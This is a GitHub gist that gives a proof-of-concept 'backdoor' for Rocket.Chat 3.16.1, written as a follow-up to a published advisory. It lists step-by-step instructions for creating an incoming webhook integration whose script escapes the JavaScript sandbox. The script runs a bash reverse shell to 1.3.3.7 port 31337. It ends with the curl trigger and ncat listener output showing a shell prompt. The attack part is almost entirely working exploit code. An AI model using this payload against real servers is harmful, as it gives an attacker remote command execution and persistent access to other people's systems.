Created
February 11, 2022 19:14
-
-
Save pich4ya/4ead1cac303579934ea006035dd0ca4e to your computer and use it in GitHub Desktop.
Rocket.Chat Backdoor with an admin user role
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @author Pichaya Morimoto (p.morimoto@sth.sh) | |
| Tested on Rocket.Chat 3.16.1 | |
| As mentioned in https://blog.sonarsource.com/nosql-injections-in-rocket-chat | |
| "Rocket.Chat has a feature called Integrations that allows creating incoming and outgoing web hooks. These web hooks can have scripts associated with them that are executed when the web hook is triggered." | |
| However, no exact instruction was given. Here we go. | |
| PoC: | |
| 1. Log in as an admin | |
| 2. Go to http://rocketchat.local/admin/integrations/new/incoming | |
| 3. Fill in name, post to channel, post as | |
| 4. Toggle the "Script Enabled" checkbox | |
| 5. In the "Script' section: | |
| const require = console.log.constructor('return process.mainModule.require')(); | |
| const { exec } = require('child_process'); | |
| exec('bash -i >& /dev/tcp/1.3.3.7/31337 0>&1'); | |
| 6. Save and Trigger with a curl command | |
| $ curl -X POST -H 'Content-Type: application/json' --data '{"text":"pwn","attachments":[{}]}' http://rocketchat.local/hooks/F5PyZhMcsDS4Dj97C/HNEL2Rhvn3uFPN6GDu9v6FCcY9KH8YwKgocccBQcfe2C9xzF | |
| $ ncat -lvp 31337 | |
| [...] | |
| bash-4.4$ | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment